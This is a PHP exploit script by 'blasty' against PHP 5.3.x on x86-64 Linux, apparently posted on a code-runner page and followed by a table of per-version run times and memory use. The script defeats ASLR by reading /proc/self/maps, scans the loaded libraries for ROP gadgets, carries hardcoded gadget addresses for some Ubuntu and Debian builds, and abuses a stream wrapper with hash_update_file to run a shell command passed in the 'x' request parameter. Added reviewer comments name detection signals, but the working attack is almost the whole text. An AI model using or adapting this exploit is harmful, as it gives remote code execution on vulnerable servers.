
<?php
/*
 * BIPSAIDS.PHP -- by blasty <blasty@fail0verflow.com>
 *
 * PHP 5.3.x Linux x86-64 arbitrary code execution
 *
 * based on : MOPS-2010-001 (yes, bugs from 2010 live in <s>2011</s> 2012)
 *
 * NOTES:
 * Most distro's ship with PIE compiled httpd's these days, and everyone
 * seems to favour php5 as module rather than using php-cgi. This puts us
 * in an annoying position for doing Return-oriented-whatever.
 *
 * So the bad news is this exploit only works without restrictions against
 * machines that use php5-cgi and where gadgets have already been identified.
 *
 * However, the good news is if PHP doesn't enforce open_basedir restrictions
 * there's still a fat chance this exploit will succeed by parsing /proc/self/maps
 * to circumvent ASLR and identify gadgets during runtime by scanning libraries.
 *
 * Review notes (defender's reading of this listing):
 *  - The trigger is hash_update_file() on a user-space stream wrapper
 *    ("evil://") whose stream_read() returns attacker-controlled bytes and
 *    re-enters the hash API (hash_final) on the context still in use. The
 *    header scopes this to PHP 5.3.x; on a maintained PHP release the
 *    trigger is not expected to do anything beyond printing the final echo.
 *  - Observable behaviour a host IDS / PHP audit log can key on, all visible
 *    below: PHP reading /proc/self/maps and then file_get_contents() on the
 *    mapped ELF images, stream_wrapper_register() being called from a
 *    request, and a request parameter 'x' that carries a shell command.
 *  - open_basedir (already noted by the author) stops the runtime gadget
 *    search; listing stream_wrapper_register / hash_update_file in
 *    disable_functions stops the trigger path. Neither replaces upgrading.
 */

error_reporting(E_ALL);

// The command to execute comes from the 'x' request parameter when served
// over HTTP, or from argv[1] on the CLI; nothing else is validated.
if (!isset($_REQUEST['x']) && !isset($argv[1]))
    die("gimme something to dance for\n");

$CMD = (isset($_REQUEST['x'])) ? $_REQUEST['x'] : $argv[1];

/**
 * Unpack a packed binary struct into named integer fields.
 *
 * $fmt is an ordered map of field name => 'u16' | 'u32' | 'u64'; fields are
 * consumed sequentially from offset 0 of $data. 'S' is machine byte order,
 * 'V' is little-endian. The u64 recombination needs 64-bit PHP integers
 * (the header targets x86-64).
 */
function ustruct($fmt, $data) {
    $out = array();
    $pos = 0;
    $upack = array('u16'=>'S','u32'=>'V','u64'=>'V2');
    $sizes = array('u16'=> 2 ,'u32'=> 4 ,'u64'=> 8 );
    foreach($fmt as $name => $type) {
        $v = unpack($upack[$type], substr($data, $pos, $sizes[$type]));
        // 'V2' yields two 32-bit halves ($v[1] low, $v[2] high)
        if ($type == 'u64')
            $v = ($v[2] << 32) | $v[1];
        else
            $v = $v[1];
        $out[$name] = $v;
        $pos += $sizes[$type];
    }
    return $out;
}

/**
 * Parse an ELF64 image from disk and return the sections whose flags have
 * bit 0x4 set (SHF_EXECINSTR in the ELF spec), each with its name ('str')
 * and raw bytes ('data') attached.
 *
 * No validation of the ELF magic, section counts or offsets is performed;
 * a truncated or non-ELF file simply yields garbage fields.
 */
function get_sections($filename) {
    // Elf64_Ehdr layout (0x40 bytes); e_ident is read as two u64s.
    $elf64_header = array(
        'e_ident0' => 'u64', 'e_ident1' => 'u64', 'type' => 'u16', 'machine' => 'u16',
        'version' => 'u32', 'entry' => 'u64', 'phoff' => 'u64', 'shoff' => 'u64',
        'flags' => 'u32', 'ehsize' => 'u16', 'phentsize' => 'u16', 'phnum' => 'u16',
        'shentsize' => 'u16', 'shnum' => 'u16', 'shstrndx' => 'u16'
    );
    // Elf64_Shdr layout.
    $elf64_sh = array(
        'name' => 'u32', 'type' => 'u32', 'flags' => 'u64', 'addr' => 'u64',
        'offset' => 'u64', 'size' => 'u64', 'link' => 'u32', 'info' => 'u32',
        'align' => 'u64', 'entsize'=> 'u64'
    );
    $buf = file_get_contents($filename);
    $hdr = ustruct($elf64_header, substr($buf, 0, 0x40));
    echo "[>>] $filename\n";
    $sections = array();
    for($i = 0; $i < $hdr['shnum']; $i++) {
        $data = substr($buf, $hdr['shoff'] + ($i * $hdr['shentsize']), $hdr['shentsize']);
        $sections[] = ustruct($elf64_sh, $data);
    }
    // Section-name string table, indexed by each section's 'name' offset.
    $str_section = $sections[ $hdr['shstrndx'] ];
    $ret_sections = array();
    for($i = 0; $i < count($sections); $i++) {
        if (!($sections[$i]['flags']&4))
            continue;
        $v = explode("\x00", substr($buf, $str_section['offset'] + $sections[$i]['name']) );
        $sections[$i]['str'] = $v[0];
        $sections[$i]['data'] = substr($buf, $sections[$i]['offset'], $sections[$i]['size']);
        $ret_sections[] = $sections[$i];
    }
    return $ret_sections;
}

/**
 * Search $data for each named byte pattern in $gg (a single string or a
 * list of alternatives per name) and return name => $base + first match.
 * Later alternatives overwrite earlier ones for the same name.
 */
function find_gadgets($gg, $data, $base=0) {
    $ret = array();
    foreach($gg as $name => $patterns) {
        if (!is_array($patterns))
            $patterns = array($patterns);
        foreach($patterns as $pattern) {
            if (($pos = strpos($data, $pattern)) !== false) {
                $ret[$name] = $base+$pos;
            }
        }
    }
    return $ret;
}

/** Pack an integer as 8 little-endian bytes (low dword first). */
function w64($v) {
    return pack("V", $v & 0xffffffff) . pack("V", $v >> 32);
}

// Under php-cgi (detected via ORIG_SCRIPT_NAME / ORIG_SCRIPT_FILENAME) a
// static per-package address table is used; otherwise, or when the running
// phpversion() is not in the table, fall through to the runtime search.
$resolve = true;
if ( ((isset($_SERVER['ORIG_SCRIPT_NAME']) && strstr($_SERVER['ORIG_SCRIPT_NAME'], "cgi") !== false) ||
      (isset($_SERVER['ORIG_SCRIPT_FILENAME']) && strstr($_SERVER['ORIG_SCRIPT_FILENAME'], "cgi") !== false)) ) {
    $resolve = false;
    $cgirop = array(
        "5.3.2-1ubuntu4.10" => array(0x42c1b8, 0x42fd31, 0x42c59d, 0x65ca2b, 0x5f0758, 0x53c720, 0xd6a830, 0x096a20),
        "5.3.5-1ubuntu7.3" => array(0x429d4f, 0x42f3e1, 0x428c26, 0x50b22d, 0x5f0758, 0x6b1730, 0xdae7d0, 0x095260),
        "5.3.3-7+squeeze3" => array(0x42d478, 0x4310c1, 0x42d85d, 0x648bdb, 0x5dc538, 0x527600, 0xd5b810, 0x084970),
        //"5.3.8" /* ARCH */ => array(0x42544c, 0x4294ba, 0x42460b, 0x428f57, 0x427859, 0x423476,
    );
    $v = phpversion();
    if (!isset($cgirop[$v])) {
        echo "plz2portgadgets: ".$v."\nattempting fallback!\n";
        $resolve = true;
    } else
        $addy = $cgirop[$v];
}

// Runtime search: walk /proc/self/maps, parse every executable, file-backed
// mapping as ELF and look for the byte patterns in its executable sections.
// This is the step open_basedir blocks (it cannot read the libraries).
if (!isset($addy)) {
    $patterns = array(
        'ADDRSP' => "\x48\x83\xc4\x28\xc3",
        'POPRAX' => "\x58\xc3",
        'LEACALL' => array(
            "\x48\x8d\x7c\x24\x10\xff\xd0",
            "\x48\x8d\x7c\x24\x18\xff\xe0"
        ),
        'SYSTEM' => "\x53\x48\x83\xec\x10\x48\x85\xff\x74\x16"
    );
    $maps = explode("\n", file_get_contents("/proc/self/maps") );
    $gadgets = array();
    foreach($maps as $map) {
        // maps columns: address-range perms offset dev inode path
        $map = explode(" ", preg_replace('!\s+!', ' ', $map));
        // skip non-executable and pseudo ([stack], [vdso], ...) mappings
        if (count($map)<2 || !strstr($map[1], "x") || $map[5][0] == '[')
            continue;
        // once only one pattern is left, restrict the scan to libc mappings
        if (count($patterns) == 1 && !strstr($map[5], "libc"))
            continue;
        $exec_sections = get_sections($map[5]);
        $tmp = explode("-", $map[0]);
        $page_offs = hexdec($tmp[0]);
        foreach($exec_sections as $section) {
            $new_gadgets = find_gadgets( $patterns, $section['data'], $section['offset'] );
            foreach($new_gadgets as $name => $offs) {
                if (isset($patterns[$name])) {
                    printf(" `- found gadget '%s' in [%s -> %s] @ 0x%x\n", $name, $map[5], $section['str'], $page_offs+$offs);
                    unset($patterns[$name]);
                    $new_gadgets[$name] += $page_offs;
                }
            }
            if (count($new_gadgets) > 0)
                $gadgets = array_merge($gadgets, $new_gadgets);
            if (count($patterns) == 0) {
                echo "!!! ALL GADGETS FOUND, LETS-A-GO !!!\n";
                break 2;
            }
        }
    }
    $addy = $gadgets;
}

// Materialise each address as a global 8-byte string named after its key
// (variable variables). The runtime path keys $addy by name; the static
// table path keys it by position, so the two branches use different lists.
if (isset($gadgets)) {
    $ropvar = array('ADDRSP','POPRAX','LEACALL','SYSTEM');
    for($i = 0; $i < count($ropvar); $i++) {
        printf("setting %s to 0x%x\n", $ropvar[$i], $addy[ $ropvar[$i] ]);
        $$ropvar[$i] = w64($addy[ $ropvar[$i] ]);
    }
} else {
    $ropvar = array('ADDRSP','POPRAX','POPRDI','DEREFRAX','SUBRDIRAX','LEACALL','GOTENTRY','LIBCDELTA');
    for($i = 0; $i < count($ropvar); $i++) {
        printf("setting %s to 0x%x\n", $ropvar[$i], $addy[ $i ]);
        $$ropvar[$i] = w64($addy[ $i ]);
    }
}
if (!isset($addy) || count($addy) != count($ropvar))
    die("looks like this tech isn't compatible with your box.\n");

/**
 * User-space stream wrapper. stream_open/eof/seek are stubs; everything
 * happens in stream_read(), which ignores $count and returns a fixed buffer
 * built from the globals set above plus $CMD.
 */
class evil_stream {
    function stream_open($a, $b, $c, &$e) { return 1; }
    function stream_eof() { return 0; }
    function stream_seek($offset, $whence) { return 0; }
    function stream_read($count) {
        global $ADDRSP, $POPRAX, $GOTENTRY, $DEREFRAX, $POPRDI, $LIBCDELTA, $SUBRDIRAX, $LEACALL, $CMD, $SYSTEM;
        // Re-enters the hash API on the context hash_update_file() is still
        // reading into -- the MOPS-2010-001 condition referenced in the header.
        hash_final($GLOBALS['hid'], false);
        $GLOBALS['a'] = str_repeat($ADDRSP, 3); // add 40, rsp
        // $CMD is concatenated into the returned bytes without any escaping.
        if (isset($SYSTEM) && !empty($SYSTEM))
            return $POPRAX . $SYSTEM . $LEACALL . str_repeat("Z", 0x58) . "WOOP ; " . $CMD . "\x00";
        else
            return $POPRAX . $GOTENTRY . $DEREFRAX . $POPRDI . $LIBCDELTA . $SUBRDIRAX . $LEACALL . str_repeat("Z", 0x58) . "WOOP ; " . $CMD . " ; echo lol\x00";
    }
}

// Trigger: hashing a URL on the custom wrapper drives stream_read() above.
// If execution reaches the final echo, the trigger had no effect.
stream_wrapper_register("evil", "evil_stream") || die("oh snap :(\n");
$hid = hash_init('md5');
hash_update_file($hid, "evil://code");
echo "you goofed up\n";
?>

Here you can find the average performance (time & memory) for each version. A grayed-out version indicates that it did not complete successfully (based on its exit code).

Version | System time (s) | User time (s) | Memory (MiB)
7.2.120.0090.00816.54
7.2.110.0100.00516.71
7.2.100.0120.00316.39
7.2.90.0100.00416.62
7.2.80.0090.00516.48
7.2.70.0100.00816.86
7.2.60.0080.00716.90
7.2.50.0100.00616.74
7.2.40.0080.00916.74
7.2.30.0070.01016.72
7.2.20.0100.00716.83
7.2.10.0100.00516.78
7.2.00.0080.00816.72
7.1.240.0060.01015.43
7.1.230.0080.00815.74
7.1.220.0050.00915.64
7.1.210.0110.00315.60
7.1.200.0080.00615.48
7.1.190.0060.01015.52
7.1.180.0100.00415.54
7.1.170.0060.00815.52
7.1.160.0060.00715.48
7.1.150.0080.00715.60
7.1.140.0070.00715.71
7.1.130.0080.00715.83
7.1.120.0080.00515.51
7.1.110.0100.00615.45
7.1.100.0060.00915.56
7.1.90.0060.01015.46
7.1.80.0040.00915.63
7.1.70.0070.00716.04
7.1.60.0070.00616.02
7.1.50.0050.00816.11
7.1.40.0030.01115.45
7.1.30.0110.00615.42
7.1.20.0070.00815.49
7.1.10.0100.00515.70
7.1.00.0050.03117.83
7.0.320.0060.00915.24
7.0.310.0170.00715.31
7.0.300.0100.01115.51
7.0.290.0130.00815.22
7.0.280.0160.00415.42
7.0.270.0130.00715.38
7.0.260.0090.01115.27
7.0.250.0170.00315.32
7.0.240.0170.00415.34
7.0.230.0100.01015.18
7.0.220.0040.01715.39
7.0.210.0160.00615.19
7.0.200.0100.00915.73
7.0.190.0080.01415.40
7.0.180.0350.00515.31
7.0.170.0130.00615.39
7.0.160.0160.00415.24
7.0.150.0090.01115.33
7.0.140.0100.03017.51
7.0.130.0170.00215.41
7.0.120.0150.00415.25
7.0.110.0070.01315.32
7.0.100.0100.02216.92
7.0.90.0170.01316.83
7.0.80.0060.02016.88
7.0.70.0120.02116.93
7.0.60.0140.01716.95
7.0.50.0170.02516.90
7.0.40.0110.02016.94
7.0.30.0130.03116.98
7.0.20.0090.03616.86
7.0.10.0150.03316.98
7.0.00.0120.02716.98
5.6.380.0130.00314.14
5.6.370.0160.00514.36
5.6.360.0170.00414.46
5.6.350.0130.00914.44
5.6.340.0160.00714.38
5.6.330.0140.00614.31
5.6.320.0140.00714.70
5.6.310.0170.00514.47
5.6.300.0150.00614.55
5.6.290.0070.01514.29
5.6.280.0120.02916.70
5.6.270.0090.01214.47
5.6.260.0090.01314.46
5.6.250.0090.02016.53
5.6.240.0100.02116.50
5.6.230.0100.01916.52
5.6.220.0100.02716.52
5.6.210.0080.02116.52
5.6.200.0090.03416.64
5.6.190.0180.01816.61
5.6.180.0140.02816.61
5.6.170.0090.03516.58
5.6.160.0130.02616.57
5.6.150.0140.02816.71
5.6.140.0120.03416.70
5.6.130.0120.03216.73
5.6.120.0050.04016.58
5.6.110.0070.03716.60
5.6.100.0110.02216.55
5.6.90.0090.03516.50
5.6.80.0120.02916.39
5.6.70.0080.03716.34
5.6.60.0090.03516.29
5.6.50.0150.02716.19
5.6.40.0130.02916.24
5.6.30.0100.03116.51
5.6.20.0070.03716.30
5.6.10.0130.02616.21
5.6.00.0110.03216.29
5.5.380.0110.01514.13
5.5.370.0070.02014.37
5.5.360.0110.01514.20
5.5.350.0080.02214.15
5.5.340.0110.03014.48
5.5.330.0090.02614.47
5.5.320.0090.03214.38
5.5.310.0100.02914.31
5.5.300.0090.02914.28
5.5.290.0080.02914.19
5.5.280.0100.02114.45
5.5.270.0100.02614.50
5.5.260.0090.03114.38
5.5.250.0080.02914.30
5.5.240.0050.03314.12
5.5.230.0130.03114.08
5.5.220.0140.02514.13
5.5.210.0110.02714.24
5.5.200.0140.02414.24
5.5.190.0110.02814.16
5.5.180.0090.02914.04
5.5.170.0170.00514.29
5.5.160.0100.02714.26
5.5.150.0100.03014.08
5.5.140.0050.03314.03
5.5.130.0080.03014.17
5.5.120.0090.02914.21
5.5.110.0160.01813.98
5.5.100.0080.03114.18
5.5.90.0100.02913.99
5.5.80.0130.01914.15
5.5.70.0080.01914.06
5.5.60.0130.01714.16
5.5.50.0100.02814.03
5.5.40.0100.02914.20
5.5.30.0080.03413.97
5.5.20.0090.03114.22
5.5.10.0120.02314.09
5.5.00.0060.02814.05
5.4.450.0070.03213.81
5.4.440.0120.02713.81
5.4.430.0100.02413.93
5.4.420.0120.02813.73
5.4.410.0070.03013.74
5.4.400.0110.02513.68
5.4.390.0090.03113.65
5.4.380.0080.03013.75
5.4.370.0060.03013.75
5.4.360.0080.03213.59
5.4.350.0070.02613.78
5.4.340.0100.02713.55
5.4.330.0090.00811.00
5.4.320.0100.02913.67
5.4.310.0030.03313.75
5.4.300.0090.02713.74
5.4.290.0100.03013.70
5.4.280.0100.02813.73
5.4.270.0120.02613.61
5.4.260.0110.02613.66
5.4.250.0070.02913.78
5.4.240.0070.02613.71
5.4.230.0130.02213.67
5.4.220.0120.02613.64
5.4.210.0110.02713.66
5.4.200.0080.02813.60
5.4.190.0090.02613.77
5.4.180.0060.03113.72
5.4.170.0110.01713.72
5.4.160.0070.02713.52
5.4.150.0110.02713.71
5.4.140.0040.02612.81
5.4.130.0140.02212.83
5.4.120.0050.03212.89
5.4.110.0090.03013.05
5.4.100.0080.03012.85
5.4.90.0090.01712.81
5.4.80.0100.01612.89
5.4.70.0070.02812.88
5.4.60.0100.02712.84
5.4.50.0080.03112.65
5.4.40.0120.02412.78
5.4.30.0080.03112.85
5.4.20.0080.02812.89
5.4.10.0130.02212.90
5.4.00.0100.02912.65
5.3.290.0120.01912.08
5.3.280.0070.03011.94
5.3.270.0120.02611.94
5.3.260.0140.01911.86
5.3.250.0070.03011.98
5.3.240.0110.02811.91
5.3.230.0070.02911.95
5.3.220.0090.02711.86
5.3.210.0080.02911.87
5.3.200.0070.03011.96
5.3.190.0100.01811.98
5.3.180.0070.01711.97
5.3.170.0090.02612.04
5.3.160.0030.03012.06
5.3.150.0100.01911.93
5.3.140.0080.02811.95
5.3.130.0080.02512.01
5.3.120.0090.01911.98
5.3.110.0090.01711.99
5.3.100.0070.02011.79
5.3.90.0090.02711.77
5.3.80.0080.02111.72
5.3.70.0100.02611.64
5.3.60.0090.02611.82
5.3.50.0070.02311.69
5.3.40.0090.03111.71
5.3.30.0060.03511.72
5.3.20.0050.03011.70
5.3.10.0070.02811.45
5.3.00.0090.03011.48
5.2.170.0060.0069.48
5.2.160.0090.0049.50
5.2.150.0020.0099.45
5.2.140.0080.0059.35
5.2.130.0040.0079.58
5.2.120.0090.0029.62
5.2.110.0050.0069.48
5.2.100.0060.0059.48
5.2.90.0080.0049.61
5.2.80.0080.0049.37
5.2.70.0020.0109.55
5.2.60.0050.0069.26
5.2.50.0070.0049.39
5.2.40.0050.0089.52
5.2.30.0070.0069.47
5.2.20.0040.0089.32
5.2.10.0060.0079.31
5.2.00.0100.0039.19
5.1.60.0080.0029.01
5.1.50.0100.0009.01
5.1.40.0090.0019.01
5.1.30.0070.0049.01
5.1.20.0090.0029.01
5.1.10.0020.0099.01
5.1.00.0030.0069.01
5.0.50.0050.0059.01
5.0.40.0090.0009.01
5.0.30.0050.0049.01
5.0.20.0020.0089.01
5.0.10.0040.0049.01
5.0.00.0030.0049.01
4.4.90.0020.0059.01
4.4.80.0020.0069.01
4.4.70.0020.0069.01
4.4.60.0030.0059.01
4.4.50.0040.0039.01
4.4.40.0050.0029.01
4.4.30.0060.0029.01
4.4.20.0050.0039.01
4.4.10.0060.0029.01
4.4.00.0060.0019.01
4.3.110.0030.0039.01
4.3.100.0070.0019.01
4.3.90.0040.0039.01
4.3.80.0030.0049.01
4.3.70.0040.0039.01
4.3.60.0030.0049.01
4.3.50.0030.0049.01
4.3.40.0000.0089.01
4.3.30.0050.0029.01
4.3.20.0040.0029.01
4.3.10.0020.0049.01
4.3.00.0020.0059.01
